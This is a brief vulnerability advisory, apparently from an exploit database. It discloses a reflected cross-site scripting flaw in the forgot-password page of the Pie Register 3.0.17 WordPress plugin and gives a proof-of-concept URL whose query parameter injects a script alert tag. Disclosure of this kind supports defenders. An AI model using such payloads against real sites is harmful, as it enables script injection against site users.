WordPress Pie Register 3.0.17 Cross Site Scripting

2018.10.25
Credit: Socket_0x03
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79

=============================================================================================== Pie Register v3.0.17 (WordPress Plugin) - Cross-Site Scripting Vulnerability in Forgot-Password =============================================================================================== ____________________________________________________________________________________ # Exploit Title: Pie Register v3.0.17 (WordPress Plugin) - XSS Vulnerability in Forgot-Password # Date: [10-19-2018] # Category: Webapps ____________________________________________________________________________________ # Author: Socket_0x03 (Alvaro J. Gene) # Email: Socket_0x03 (at) teraexe (dot) com # Website: www.teraexe.com ____________________________________________________________________________________ # Software Link: https://wordpress.org/plugins/pie-register # Plugin: Pie Register # Version: v3.0.17 (last version) # File: Forgot-Password # Language: This application is available in English language. # Plugin Description: Pie Register is a WordPress plugin that an administrator can use to create different kinds of forms without programming knowledge. In addition, an administrator can use Pie Register for payment features; for example, if an administrator is using Pie Register to provide some kind of service, he/she can charge an amount to his/her users via PayPal. ____________________________________________________________________________________ # Cross-Site Scripting Vulnerability: Name of an arbitrarily supplied URL parameter: http://www.website.com/wordpress/index.php/forgot-password/?i4pk8"><script>alert(23)</script>t28bu=1


Vote for this issue:
100%
0%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top